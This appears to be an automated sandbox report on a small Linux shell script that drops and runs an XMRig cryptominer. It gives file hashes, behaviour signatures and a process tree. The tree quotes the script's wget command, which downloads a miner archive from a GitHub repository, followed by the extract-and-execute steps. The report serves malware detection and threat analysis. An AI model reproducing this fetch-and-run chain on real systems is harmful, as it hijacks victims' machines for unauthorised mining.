Analysis

  • max time kernel
    1799s
  • max time network
    1792s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    16-10-2024 23:47

General

  • Target

    runnb.sh

  • Size

    160B

  • MD5

    87ea8773efcca67a4f2ce3e1ba1d1ff8

  • SHA1

    0770e97785f007f7a3bc9d7e35a72b16895c366d

  • SHA256

    765a3183613b556d32d8775fc21410c61d1565a372c27ed54193d4808b5cdb01

  • SHA512

    df69c7a84df081850f4a1f72d78f65ddf61074fd4af7f989458cdc4273b5a64eeccb6864391ca780875e7b754834bbcbb17d550c4c9514101a8d3f45470ac514

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 45 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 27 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 8 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/runnb.sh
    /tmp/runnb.sh
    1⤵
      PID:1572
      • /usr/bin/wget
        wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
        2⤵
        • Writes file to tmp directory
        PID:1573
      • /usr/bin/tar
        tar xvf xmrigtar.tar.gz
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1578
        • /usr/local/sbin/gzip
          gzip -d
          3⤵
            PID:1584
          • /usr/local/bin/gzip
            gzip -d
            3⤵
              PID:1584
            • /usr/sbin/gzip
              gzip -d
              3⤵
                PID:1584
              • /usr/bin/gzip
                gzip -d
                3⤵
                  PID:1584
              • /usr/bin/chmod
                2⤵
                  PID:1586
                • /tmp/xmrig-6.22.0/xmrig
                  2⤵
                  • Executes dropped EXE
                  • Checks hardware identifiers (DMI)
                  • Reads hardware information
                  • Checks CPU configuration
                  • Reads CPU attributes
                  • Enumerates kernel/hardware configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:1587

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /root/.wget-hsts

                Filesize

                215B

                MD5

                afb5928f4ccf51581f8ba150e814812c

                SHA1

                b8c3fbab40f191f1e161ffdade3ac0f5c66a25bd

                SHA256

                eebbdbafbbe840fbb62e1b79d555dbb6d9f558013aba6385924ca48697e00ecb

                SHA512

                f9567d8ce892a46585da43191b3820248b87f39ed21541797abccfe977d884e906d6da48f16459b7a69a0435e58ba18827715a7d33c3dd9d0f182965bd8de2b6

              • /tmp/xmrig-6.22.0/SHA256SUMS

                Filesize

                150B

                MD5

                19f1bb08cf8997837b1f738b76ca97e9

                SHA1

                c497499ad539d6ef580c6c932a2633fe820abded

                SHA256

                99ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa

                SHA512

                fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230

              • /tmp/xmrig-6.22.0/config.json

                Filesize

                919B

                MD5

                0a9b0011891eae4086d16c3364e772ff

                SHA1

                98fe8a7b5b6b0c0aa7635e4e388c67c863772b69

                SHA256

                1aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd

                SHA512

                9e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554

              • /tmp/xmrig-6.22.0/config.json

                Filesize

                1KB

                MD5

                1879742a3f028a8e227f3b6b51756269

                SHA1

                20365c0cf35e787f525baede3646cfdfe6001cba

                SHA256

                4042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5

                SHA512

                e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731

              • /tmp/xmrig-6.22.0/xmrig

                Filesize

                7.7MB

                MD5

                466d426a411add606457183e2b648960

                SHA1

                2b7d2dda0fccc79542d50251ef6b307b43a0131c

                SHA256

                e5617635d8a9497560a41fbeea5bde8d585bb2a619d4901b4f1f31bd3455076f

                SHA512

                9eb3dbad333615665fd7c70b8fd3cb012039faeadbf42f8d757e68dd26820611630c1a2a8c283fbd74b9d11ce57337030965e4d63f0d44c3d2ac4c3e1468bd59

              • /tmp/xmrigtar.tar.gz

                Filesize

                3.4MB

                MD5

                ccdb2d76041e107dff38f962d65b3d4b

                SHA1

                e9360c43398f3725b0a3eb87e2448ac416d96be3

                SHA256

                11d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f

                SHA512

                f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d